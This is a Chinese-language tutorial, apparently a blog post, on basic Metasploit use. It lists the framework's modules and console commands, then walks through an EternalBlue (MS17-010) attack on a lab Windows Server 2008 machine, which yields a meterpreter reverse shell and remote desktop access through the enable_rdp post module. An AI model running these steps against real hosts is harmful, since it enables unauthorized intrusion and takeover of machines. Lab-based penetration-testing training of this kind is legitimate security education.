Metasploit基本使用

Metasploit框架介绍

Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件实施攻击。它本身附带数千个已知软件漏洞的专业级漏洞攻击工具。

MSF模块介绍

Auxiliary 辅助模块 对渗透测试信息收集提供大量的辅助模块支持
Exploits 攻击模块 利用发现的漏洞对目标进行攻击
Payload 攻击载荷模块 攻击成功后促使靶机运行的一段植入代码
Post 后渗透攻击模块 收集更多信息或进一步访问目标系统
Encoders 编码模块 将攻击载荷进行编码,来进行绕过
Nops 空指令模块 与编码模块联合使用
Evasion 免杀模块

MSF的基本使用

首先输入 service postgresql start 来开始数据库
然后输入 msfconsole 开启msf
在这里插入图片描述
db_status 查看数据库状态
在这里插入图片描述

MSF基础指令

help/? 帮助菜单
exit/quit 退出msf控制台
Back 返回上一级
info 显示一个或者多个模块的信息
show 显示所给类型的模块
backfround 将当前操作在后台运行
use 使用所选择的模块
set 设置选项
unset 取消设置的选项
history 展示使用命令的历史记录
search 模糊查找

MSF攻击演示

这边演示的是永恒之蓝
我们打开一台sever 2008的虚拟机,查看ip,然后与kali的那台虚拟机互ping,看能否ping通
在这里插入图片描述
在这里插入图片描述
然后我们要看他是否开启了445端口,我们在kali虚拟机输入 db_nmap 192.168.xxx -p 445
在这里插入图片描述
通过输入 search ms17-010 来查看需要哪些模块
在这里插入图片描述
输入use 编号 选定一个模块,输入options来查看需要设置什么
在这里插入图片描述
Required为yes的地方yes为空的地方需要设置
RHOSTS 为我们要攻击的地址
RPOST 为攻击的端口
THREADS 为攻击的线程数,越高越快
输入set rhosts 192.168.xxx
然后输入run 进行攻击
在这里插入图片描述
输入search ms17-010 然后选定一个攻击模块,选定之后,会自动生成一个payload
在这里插入图片描述

windows 你对方攻击的是什么系统
/x64/meterpreter/ 后渗透攻击工具
reverse 反向链接
_tcp 传输控制协议
如果你不想用这个payload,你可以输入show payloads 来选择一个你想要的
输入options来查看需要设置的选项,然后set 选项 设置完成之后直接run
如果出现了一个WIN,那就代表攻击成功了,并且返回了一个meterpreter会话
在这里插入图片描述
然后可以输入?来查看帮助文档
输入getuid 来查看当前的权限
在这里插入图片描述
输入shell 可以使用受害者的cmd
我们输入background将这个先放在后台
在这里插入图片描述

如果想连接目标的3389,而目标没有开启的话,我们可以输入search enable_rdp 来查找 ,然后选中查找到的模块,然后options查看需要设置的选项,我们可以看到只有一个sessions需要我们设置,而这个session就是我们刚才放到后台的那个会话
在这里插入图片描述
输入 set session 2 就设置好了,然后run,我们再去查看3389端口的时候,就可以看他已经是开启状态了
然后我们新开一个终端,输入resktop 192.168.xxx ,就可以远程连接了
在这里插入图片描述

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值